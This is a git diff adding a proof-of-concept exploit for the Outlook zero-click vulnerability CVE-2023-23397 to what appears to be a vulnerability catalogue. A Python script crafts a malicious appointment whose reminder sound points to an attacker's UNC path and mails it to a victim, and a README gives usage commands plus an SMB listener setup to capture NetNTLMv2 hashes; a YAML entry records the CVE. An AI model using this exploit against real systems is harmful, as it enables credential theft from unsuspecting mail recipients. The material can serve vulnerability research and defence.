diff --git a/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py b/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py new file mode 100644 index 0000000000000000000000000000000000000000..e40c73189c506f639e6487bee69f16ca6a3ca97e --- /dev/null +++ b/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py @@ -0,0 +1,70 @@ +import smtplib, datetime, argparse +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText +from email.mime.application import MIMEApplication +from email.utils import COMMASPACE, formatdate +from independentsoft.msg import Message + +# Mail configuration : change it ! +smtp_server = "mail.example.com" +smtp_port = 587 + +sender_email = "attacker@mail.example.com" +sender_password = "P@ssw0rd" + +recipients_email = ["victim@mail.example.com"] + +class Email: + def __init__(self, smtp_server, port, username, password, recipient): + self.smtp_server = smtp_server + self.port = port + self.username = username + self.password = password + self.recipient = recipient + + def send(self, subject, body, attachment_path): + msg = MIMEMultipart() + msg['From'] = self.username + msg['To'] = COMMASPACE.join(self.recipient) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + + msg.attach(MIMEText(body)) + + with open(attachment_path, 'rb') as f: + part = MIMEApplication(f.read(), Name=attachment_path) + part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' + msg.attach(part) + + try: + server = smtplib.SMTP(self.smtp_server, self.port) + server.starttls() + server.login(self.username, self.password) + server.sendmail(self.username, self.recipient, msg.as_string()) + server.quit() + print("[+] Malicious appointment sent !") + + + except Exception as e: + print("[-] Error with SMTP server...", e) + +parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') +parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) +args = parser.parse_args() + +appointment = Message() +appointment.message_class = "IPM.Appointment" +appointment.subject = "CVE-2023-23397" +appointment.body = "New meeting now !" +appointment.location = "Paris" +appointment.appointment_start_time = datetime.datetime.now() +appointment.appointment_end_time = datetime.datetime.now() +appointment.reminder_override_default = True +appointment.reminder_sound_file = args.path +appointment.save("appointment.msg") + +email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) + +subject = "Hello There !" +body = "Important appointment !" +email.send(subject, body, "appointment.msg") diff --git a/cve/Outlook/2023/CVE-2023-23397/README.md b/cve/Outlook/2023/CVE-2023-23397/README.md new file mode 100644 index 0000000000000000000000000000000000000000..094e829ddabb253e6a57cd3da7e803ace7dac17f --- /dev/null +++ b/cve/Outlook/2023/CVE-2023-23397/README.md @@ -0,0 +1,41 @@ +# CVE-2023-23397 + +Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client. + +## Description + +Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + +An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox. + +## What does the poc do? + +1. Generated `.msg` payload. +2. Send it by email with custom SMTP server. + +## Usage + +In one session : + +```python +python CVE-2023-23397.py + +usage: CVE-2023-23397.py [-h] -p PATH +CVE-2023-23397.py: error: the following arguments are required: -p/--path + +python CVE-2023-23397.py --path '\\yourip\' +``` + +In a second session (`smbserver` or `responder` as you want). + +``` +smbserver.py -smb2support SHARE . +``` + +## Demo (manual poc) + +![poc](poc.gif) + +## Original article + +https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ \ No newline at end of file diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml new file mode 100644 index 0000000000000000000000000000000000000000..11f0fd086319ad74ef1f9036891f68b337111330 --- /dev/null +++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-23397 +source: https://github.com/Trackflaw/CVE-2023-23397 +info: + name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 + severity: critical + description: | + Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + scope-of-influence: + outlook-2013, outlook-2016, outlook-2019 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23397 + cwe-id: CWE-294 + cnvd-id: None + kve-id: None + tags: Microsoft, Outlook, cve2023, 权限提升漏洞 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 428354b052e24bcd706182b37e638525cdc3550c..6dcfa282aef0decb0e4685ef86208147412a5082 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -13,6 +13,8 @@ cve: - CVE-2023-0179 polkit: - CVE-2021-3560 + Outlook: + - CVE-2023-23397 redis: - CVE-2022-0543 EsFileExplorer: